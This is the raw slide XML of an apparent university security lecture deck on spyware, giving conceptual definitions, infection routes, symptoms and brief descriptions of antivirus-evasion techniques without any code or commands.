                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> This technique involves using various methods to make the code of the malware difficult to understand and analyze. This includes techniques such as code substitution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-476250">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="-150" checksum="3228161236"/>
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Dynamic Code Generation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> This technique involves generating new code each time the malware is executed. The generated code retains the functionality of the original code, but is structurally different, making it difficult for anti-virus products to detect the malware.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-476250">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="-150" checksum="3228161236"/>
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Instruction Substitution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>: This technique involves modifying the code of the malware to use different machine instructions, while retaining its functionality. This makes it difficult for anti-virus products to detect the malware, as the code signatures generated by these different instructions are unique.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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srcRect t="4519" b="16150"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-32385"/>
            <a:ext cx="12179935" cy="6889750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-32385"/>
            <a:ext cx="12192000" cy="69005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charset="0"/>
              <a:ea typeface="阿里巴巴普惠体 R" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="矩形 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-19050" y="2219960"/>
            <a:ext cx="12198985" cy="10147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prstClr val="black"/>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prstClr val="black"/>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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9640129" y="6095138"/>
            <a:ext cx="2379149"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023.10.05</a:t>
            </a:r>
            <a:endPar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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4768215" y="3272790"/>
            <a:ext cx="2655570" cy="124523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Fangtian</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">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 </a:t>
            </a:r>
            <a:r>
              <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Zhong</a:t>
            </a:r>
            <a:endPar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CSCI </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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591</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN"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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="675098" y="173263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5" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2992261" y="1228497"/>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1" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1969007" y="437235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3"/>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7" name="Freeform 298"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11101499" y="3197526"/>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8" name="Freeform 302"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11362690" y="125349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25" name="Freeform 157"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10433905" y="20177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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="4955540"/>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Gianforte School of Computing </a:t>
            </a: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200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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E-mail: fangtian.zhong@montana.edu</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311785" y="46355"/>
            <a:ext cx="2063115" cy="1447165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1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1" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>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pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4260850" y="2934653"/>
            <a:ext cx="7908925" cy="988695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:sp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sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="BF191A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Spyware </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="BF191A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17"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74E7442A-BA00-4274-AC47-95D95C23D1C8}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E13747">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9"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01</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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sp>
        <p:nvSpPr>
          <p:cNvPr id="20"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Part One</a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="组合 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="L 形 21"/>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3" name="L 形 22"/>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4" name="L 形 23"/>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5" name="直角三角形 24"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D1202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26" name="矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426"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7" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103"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What is Spyware?</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8"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319405" y="1148080"/>
            <a:ext cx="11567160" cy="474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Application that send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>s information from your computer to the creator of the spyware</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Sometimes consists of an apparent core functionality and a hidden functionality of information gathering (Trojan)</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Can be used by websites for marketing information, to determine their stance with regard to competitors and market trends </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Can also be used to log keystrokes and send those to whomever</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endParaRPr lang="en-US" altLang="zh-CN" sz="30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What is Spyware ?</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455295" y="1238885"/>
            <a:ext cx="10528935" cy="490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Software installed on a computer without the user's knowledge which gathers information about that user for later retrieval by whomever controls the spyware.</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Spyware can be broken down into two different categories:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-533400">
              <a:lnSpc>
                <a:spcPts val="30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3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>surveillance spyware </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-533400">
              <a:lnSpc>
                <a:spcPts val="30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3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>advertising spyware.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="38100" indent="0">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="020206030504050203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What is Spyware ?</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455295" y="1238885"/>
            <a:ext cx="10528935" cy="490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Surveillance spyware:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-533400">
              <a:lnSpc>
                <a:spcPts val="25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2600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Includes key loggers, screen capture devices, and Trojans. They would be used by corporations, private detectives, law enforcement, intelligence agencies, suspicious spouses.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502030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Advertising spyware:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-533400">
              <a:lnSpc>
                <a:spcPts val="25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2600" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Software that is installed alongside other software, often without the user's knowledge, or without full disclosure that it will be used for gathering personal information and/or showing the user ads.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-533400">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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2600" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Advertising spyware logs information about the user, possibly including passwords, email addresses, web browsing history, online buying habits, the computer's hardware and software configuration, the name, age, gender,etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-533400">
              <a:lnSpc>
                <a:spcPts val="25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endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="0" dirty="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Computers Get Infected</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8"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319405" y="1148080"/>
            <a:ext cx="11567160" cy="535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Basic forms of spyware can be picked up simply by visiting a Web page.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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Spyware may also be picked up through email.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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You are particularly likely to be exposed by downloading software, in particular "freeware" and "shareware" offerings.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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Many software downloads are "free," but within the End User License Agreement (EULA) are provisions to use information from your computer or your email and other contact information.  You have to agree to the EULA to download or install, so you essentially agree to allow someone else to use information about your computer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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That's why the definition of spyware is "generally without your knowledge or consent."  Often, you've consented.  You just don't realize it because you didn't read the fine print.  This is why the definition of spyware includes the lawyerism "potentially unwanted technologies."</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="26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Spyware Symptoms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8"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319405" y="1148080"/>
            <a:ext cx="11567160" cy="535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Spyware often operate silently, monitoring your Web surfing activities and reporting back what sites you have visited to a marketing organization.  Others display "pop-up" ads on your computer's desktop or on top of other Web pages.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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More aggressive spyware will reset your browser's home page (the page that appears when the browser starts up), change the service your browser uses for Web searches, or add new sites to your favorites list.  Or produce even more invasive advertisements. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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The most damaging spyware programs can actually install "trojans" -- computer programs which allow other people to remotely access an infected computer.  Such spyware programs can run silently "in the background" and are capable of doing anything that a typical computer program can do which does not require your intervention.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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Sometimes a spyware-infected computer will run more slowly due to all the activity going on in the background.  But your computer seems to be running at normal speed, it doesn't mean you are safe. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
